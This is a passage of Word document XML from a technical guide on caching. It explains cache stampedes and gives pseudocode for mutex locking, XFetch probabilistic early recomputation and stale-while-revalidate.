        <w:t> than application-level invalidation because it catches all writes regardless of code path. The trade-off: CDC adds latency (typically seconds) and infrastructure complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314792FA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="2A9B191B">
          <v:rect id="_x0000_i4792" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DE5B43" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Cache Stampede and Thundering Herd — The Concurrency Problems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5FD608" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Cache Stampede Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A2CFB0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>When a popular cache entry expires, hundreds or thousands of concurrent requests simultaneously find the entry missing and simultaneously query the backing store for the same data. The backing store receives a spike of identical queries — potentially overloading it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76068A85" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem magnitude:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FD0C9F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDA16CA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Scenario: 10,000 concurrent requests, popular key expires every 60 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A913EE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Without protection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6E756A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  T=60s: key expires</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079B4930" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  T=60.000–60.001s: 10,000 requests simultaneously miss cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B537CA5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  T=60.001s: 10,000 simultaneous DB queries for the same key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE1A758" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  DB overload → increased latency → more in-flight requests → cascade failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DDE043" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution 1: Mutex/Locking (Request Coalescing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F16FF1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A601EEE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def get_with_lock(key, compute_fn):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048F7B03" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    value = cache.get(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6EE0CF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    if value is not None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB319F3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        return value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F75453" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6AADD8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    # Cache miss — try to acquire lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469C326D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    lock_key = f'lock:{key}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71475C48" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    acquired = cache.set(lock_key, '1', nx=True, ex=10)  # atomic set-if-not-exists, 10s TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AC2A72" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE52DA8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    if acquired:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F15627E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        # This thread is the "leader" — compute and populate cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32705B29" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B65F024" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">            value = compute_fn()             # fetch from DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BA4A0E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">            cache.set(key, value, ex=3600)  # populate cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B7BEAB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">            return value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251AA02E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097FDA82" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">            cache.delete(lock_key)           # release lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EE5FE2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE10C7C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        # Another thread is computing — wait and retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A8D168" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        time.sleep(0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E764CE3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        return get_with_lock(key, compute_fn)  # retry (will likely be a cache hit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B706C97" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mutex approach serializes cache population</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — only one thread fetches from the backing store per cache miss. All other threads wait and retry, finding the cache populated on their next attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0302CBAE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4C7821" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1361"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Wait time:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Threads waiting for the lock sleep and retry — adding latency for those requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A93A06" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1361"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lock expiry:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> If the computing thread crashes or takes too long, the lock expires and another thread takes over. Multiple threads may compute simultaneously near the lock expiry boundary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C23ACDC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1361"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Redis SETNX as distributed lock:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> cache.set(key, value, nx=True, ex=ttl) atomically sets the key only if it doesn't exist (nx=True) with expiry ex. This is a basic distributed lock. More sophisticated locking uses Redlock (multi-master Redis lock) for better fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB1BA2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution 2: Probabilistic Early Recomputation (XFetch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724FFA07" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Instead of waiting for TTL expiry to recompute, </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>probabilistically recompute before expiry</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t>, with probability inversely proportional to time remaining:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0137D921" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569180C2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def get_with_xfetch(key, compute_fn, beta=1.0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27056E0B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    value, expiry = cache.get_with_expiry(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B5997" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    if value is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4988B52B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        # Hard miss — must compute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9B1F1F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        return recompute(key, compute_fn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06059C57" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204B724D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    # Soft hit — check if we should early-recompute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096CAC66" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    ttl_remaining = expiry - time.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291E6FEA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    # XFetch formula: recompute if random() &lt; exp(-ttl_remaining / (compute_time * beta))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB839F4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    compute_time = measure_last_compute_time(key)  # how long does fetching take?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2994063B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBFCEF1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    if random() &lt; math.exp(-ttl_remaining / (compute_time * beta)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F72AE4C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        # Probabilistically decided to recompute early</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D955CAC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        new_value = compute_fn()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2610FBC4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        cache.set(key, new_value, ex=3600)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74975A67" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return new_value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D741734" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AB146A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    return value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533AD6FC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mathematical insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> As TTL remaining approaches 0, the probability of recomputation approaches 1. When TTL is large (item freshly cached), probability is near 0. The beta parameter controls aggressiveness — higher beta → earlier recomputation → more DB load but better protection against stampedes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13566F65" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XFetch eliminates stampedes</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> by spreading recomputation across many requests over the TTL period rather than concentrating all computation at the expiry moment. The probabilistic nature means different requests trigger recomputation at different times — the backing store sees a smooth query rate rather than a spike.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC341B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution 3: Stale-While-Revalidate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6767D569" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Serve stale data immediately while asynchronously fetching fresh data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157302AD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783A5F0A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def get_stale_while_revalidate(key, compute_fn, max_age=3600, stale_ttl=300):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725D0BAD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    value, state = cache.get_with_state(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7695CE3A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1573F0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    if state == 'FRESH':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0DBB8C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        return value  # cache hit, within max_age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE098FD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265A056B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    elif state == 'STALE':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668E95BD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        # Beyond max_age but within stale_ttl window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07135286" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        # Serve stale immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B519083" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        if not revalidation_in_progress(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53219D0C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">            # Trigger async revalidation (background task/thread)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B92BCAF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">            background.submit(lambda: revalidate(key, compute_fn))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575D71EB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        return value  # serve stale to this request right now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E8373D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059BE419" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    elif state == 'MISS':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488A4AC1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        # No entry at all — must wait for computation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C62A660" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        value = compute_fn()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F95B007" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        cache.set(key, value, max_age=max_age, stale_ttl=stale_ttl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8EDFD2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        return value</w:t>
      </w:r>
    </w:p>
